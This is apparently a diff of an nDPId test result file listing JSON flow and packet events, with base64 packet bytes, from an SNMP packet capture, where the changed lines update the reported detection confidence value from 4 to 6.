+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"snmp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326976979,"flow_last_seen":1597326976979,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597326976979,"l3_proto":"ip4","src_ip":"30.54.142.240","dst_ip":"250.58.112.87","src_port":56251,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"snmp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1597326977116,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1597326977116,"pkt":"AAwpBeNBAAAAuxzeCABFAACFAAoAAP8Ro6X6OnBXHjaO8ACh27sAcS3eMGcCAQMwEAIEbJr1bgICBdwEAQACAQMEHTAbBAyAAAAJAwCqu8wAAQACAQwCAgLNBAAEAAQAMDEEDIAAAAkDAKq7zAABAAQAqB8CBHUFWIgCAQACAQAwETAPBgorBgEGAw8BAQQAQQEB"} 00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"snmp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1597326977118,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"thread_ts_msec":1597326977118,"pkt":"AAAAuxzeAAwpBeNBCABFAACPyNFAAEARWdQeNo7w+jpwV9u7AKEAe86sMHECAQMwEQIEbJr1bQIDAP\/jBAEEAgEDBCkwJwQMgAAACQMAqrvMAAEAAgEMAgICzQQMTk9BVVRITk9QUklWBAAEADAuBAyAAAAJAwCqu8wAAQAEAKEcAgR1BViHAgEAAgEAMA4wDAYIKwYBAgEBBQAFAA=="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"snmp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326981183,"flow_last_seen":1597326981183,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597326981183,"l3_proto":"ip4","src_ip":"30.54.142.240","dst_ip":"250.58.112.87","src_port":52435,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"snmp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1597326981183,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1597326981183,"pkt":"AAAAuxzeAAwpBeNBCABFAABcyU5AAEARWYoeNo7w+jpwV8zTAKEASN4QMD4CAQMwEQIEW6KoJAIDAP\/jBAEEAgEDBBAwDgQAAgEAAgEABAAEAAQAMBQEAAQAoA4CBAxVvh4CAQACAQAwAA=="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"snmp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326981183,"flow_last_seen":1597326981183,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597326981183,"l3_proto":"ip4","src_ip":"30.54.142.240","dst_ip":"250.58.112.87","src_port":52435,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"snmp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326981183,"flow_last_seen":1597326981183,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597326981183,"l3_proto":"ip4","src_ip":"30.54.142.240","dst_ip":"250.58.112.87","src_port":52435,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"snmp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1597326981296,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1597326981296,"pkt":"AAwpBeNBAAAAuxzeCABFAACFAA0AAP8Ro6L6OnBXHjaO8AChzNMAcYE6MGcCAQMwEAIEW6KoJAICBdwEAQACAQMEHTAbBAyAAAAJAwCqu8wAAQACAQwCAgLRBAAEAAQAMDEEDIAAAAkDAKq7zAABAAQAqB8CBAxVvh4CAQACAQAwETAPBgorBgEGAw8BAQQAQQEC"} 00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"snmp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1597326981298,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"thread_ts_msec":1597326981298,"pkt":"AAAAuxzeAAwpBeNBCABFAACPyaxAAEARWPkeNo7w+jpwV8zTAKEAezX3MHECAQMwEQIEW6KoIwIDAP\/jBAEEAgEDBCkwJwQMgAAACQMAqrvMAAEAAgEMAgIC0QQMTk9BVVRITk9QUklWBAAEADAuBAyAAAAJAwCqu8wAAQAEAKEcAgQMVb4dAgEAAgEAMA4wDAYIKwYBAgEBBAAFAA=="} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":29,"source":"snmp.pcap","alias":"nDPId-test","packets-captured":29,"packets-processed":28,"total-skipped-flows":0,"total-l4-payload-len":2120,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":4,"total-updates":0,"current-active-flows":6,"total-active-flows":6,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":37,"global_ts_msec":1597327640387} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"snmp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597327640387,"flow_last_seen":1597327640387,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597327640387,"l3_proto":"ip4","src_ip":"35.95.158.217","dst_ip":"30.79.214.36","src_port":60440,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"snmp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1597327640387,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1597327640387,"pkt":"AAAA82AcAAwpEAFdCABFAABcnENAAEAR56EjX57ZHk\/WJOwYAKEASB50MD4CAQMwEQIEPsyxCwIDAP\/jBAEEAgEDBBAwDgQAAgEAAgEABAAEAAQAMBQEAAQAoA4CBGdAU6sCAQACAQAwAA=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"snmp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597327640387,"flow_last_seen":1597327640387,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597327640387,"l3_proto":"ip4","src_ip":"35.95.158.217","dst_ip":"30.79.214.36","src_port":60440,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"snmp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597327640387,"flow_last_seen":1597327640387,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597327640387,"l3_proto":"ip4","src_ip":"35.95.158.217","dst_ip":"30.79.214.36","src_port":60440,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"snmp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1597327640485,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1597327640485,"pkt":"AAwpEAFdAAAA82AcCABFAACFAC4AAP8RBI4eT9YkI1+e2QCh7BgAcbQKMGcCAQMwEAIEPsyxCwICBdwEAQACAQMEHTAbBAyAAAAJAwCqu8wAAQACAQwCAgVkBAAEAAQAMDEEDIAAAAkDAKq7zAABAAQAqB8CBGdAU6sCAQACAQAwETAPBgorBgEGAw8BAQQAQQEN"} 00602{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"snmp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1597327640489,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1597327640489,"pkt":"AAAA82AcAAwpEAFdCABFAACZnE9AAEAR51gjX57ZHk\/WJOwYAKEAhSYyMHsCAQMwEQIEPsyxCgIDAP\/jBAEFAgEDBDMwMQQMgAAACQMAqrvMAAEAAgEMAgIFZAQKU0hBMU5PUFJJVgQM+aZLjyUgeKDqkPwVBAAwLgQMgAAACQMAqrvMAAEABAChHAIEZ0BTqgIBAAIBADAOMAwGCCsGAQIBAQUABQA="} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"snmp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597327646611,"flow_last_seen":1597327646611,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597327646611,"l3_proto":"ip4","src_ip":"35.95.158.217","dst_ip":"30.79.214.36","src_port":49306,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"snmp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1597327646611,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1597327646611,"pkt":"AAAA82AcAAwpEAFdCABFAABcoAFAAEAR4+MjX57ZHk\/WJMCaAKEASMHoMD4CAQMwEQIEaTnV4AIDAP\/jBAEEAgEDBBAwDgQAAgEAAgEABAAEAAQAMBQEAAQAoA4CBH1wgzUCAQACAQAwAA=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"snmp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597327646611,"flow_last_seen":1597327646611,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597327646611,"l3_proto":"ip4","src_ip":"35.95.158.217","dst_ip":"30.79.214.36","src_port":49306,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"snmp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597327646611,"flow_last_seen":1597327646611,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597327646611,"l3_proto":"ip4","src_ip":"35.95.158.217","dst_ip":"30.79.214.36","src_port":49306,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"snmp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1597327646725,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1597327646725,"pkt":"AAwpEAFdAAAA82AcCABFAACFADEAAP8RBIseT9YkI1+e2QChwJoAcVZ4MGcCAQMwEAIEaTnV4AICBdwEAQACAQMEHTAbBAyAAAAJAwCqu8wAAQACAQwCAgVrBAAEAAQAMDEEDIAAAAkDAKq7zAABAAQAqB8CBH1wgzUCAQACAQAwETAPBgorBgEGAw8BAQQAQQEO"} 00602{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"snmp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1597327646730,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1597327646730,"pkt":"AAAA82AcAAwpEAFdCABFAACZoDlAAEAR424jX57ZHk\/WJMCaAKEAhS98MHsCAQMwEQIEaTnV3wIDAP\/jBAEFAgEDBDMwMQQMgAAACQMAqrvMAAEAAgEMAgIFawQKU0hBMU5PUFJJVgQMdsqnL4gHLPYGipA6BAAwLgQMgAAACQMAqrvMAAEABAChHAIEfXCDNAIBAAIBADAOMAwGCCsGAQIBAQQABQA="} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1597326838035,"flow_last_seen":1597326838291,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1597327647026,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":59988,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1597326815572,"flow_last_seen":1597326815833,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1597327647026,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":43015,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1597326976979,"flow_last_seen":1597326977413,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1597327647026,"l3_proto":"ip4","src_ip":"30.54.142.240","dst_ip":"250.58.112.87","src_port":56251,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1597326863415,"flow_last_seen":1597326863776,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1597327647026,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":58433,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1597326858008,"flow_last_seen":1597326858289,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1597327647026,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":37224,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1597326981183,"flow_last_seen":1597326981598,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":661,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1597327647026,"l3_proto":"ip4","src_ip":"30.54.142.240","dst_ip":"250.58.112.87","src_port":52435,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1597326838035,"flow_last_seen":1597326838291,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1597327647026,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":59988,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1597326815572,"flow_last_seen":1597326815833,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1597327647026,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":43015,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1597326976979,"flow_last_seen":1597326977413,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1597327647026,"l3_proto":"ip4","src_ip":"30.54.142.240","dst_ip":"250.58.112.87","src_port":56251,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1597326863415,"flow_last_seen":1597326863776,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1597327647026,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":58433,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1597326858008,"flow_last_seen":1597326858289,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1597327647026,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":37224,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1597326981183,"flow_last_seen":1597326981598,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":661,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1597327647026,"l3_proto":"ip4","src_ip":"30.54.142.240","dst_ip":"250.58.112.87","src_port":52435,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597327800258,"flow_last_seen":1597327800258,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597327800258,"l3_proto":"ip4","src_ip":"131.179.49.165","dst_ip":"254.158.1.169","src_port":60694,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1597327800258,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1597327800258,"pkt":"AAAAV4hpAAwpsVpsCABFAABcjYRAAEAR92yDszGl\/p4Bqe0WAKEASKFzMD4CAQMwEQIESC476wIDAP\/jBAEEAgEDBBAwDgQAAgEAAgEABAAEAAQAMBQEAAQAoA4CBFFbpQoCAQACAQAwAA=="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597327800258,"flow_last_seen":1597327800258,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597327800258,"l3_proto":"ip4","src_ip":"131.179.49.165","dst_ip":"254.158.1.169","src_port":60694,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597327800258,"flow_last_seen":1597327800258,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597327800258,"l3_proto":"ip4","src_ip":"131.179.49.165","dst_ip":"254.158.1.169","src_port":60694,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"snmp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1597327800373,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1597327800373,"pkt":"AAwpsVpsAAAAV4hpCABFAACFADwAAP8RBYz+ngGpg7MxpQCh7RYAcTFqMGcCAQMwEAIESC476wICBdwEAQACAQMEHTAbBAyAAAAJAwCqu8wAAQACAQwCAgYEBAAEAAQAMDEEDIAAAAkDAKq7zAABAAQAqB8CBFFbpQoCAQACAQAwETAPBgorBgEGAw8BAQQAQQES"} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"snmp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1597327800375,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"thread_ts_msec":1597327800375,"pkt":"AAAAV4hpAAwpsVpsCABFAACkjZFAAEAR9xeDszGl\/p4Bqe0WAKEAkIDGMIGFAgEDMBECBEguO+oCAwD\/4wQBBwIBAwQ7MDkEDIAAAAkDAKq7zAABAAIBDAICBgQEClNIQTFBRVMxMjgEDFRZRuSc\/VhrMMFzGAQIOby89G+ocM4EMAJRqrL1y0ddF49kZLmuqEd2Zc5EUOuNk0HcYVl0aShUgcBxMzYymbe4GgHUhuqMnA=="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"snmp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597327805470,"flow_last_seen":1597327805470,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597327805470,"l3_proto":"ip4","src_ip":"131.179.49.165","dst_ip":"254.158.1.169","src_port":35970,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 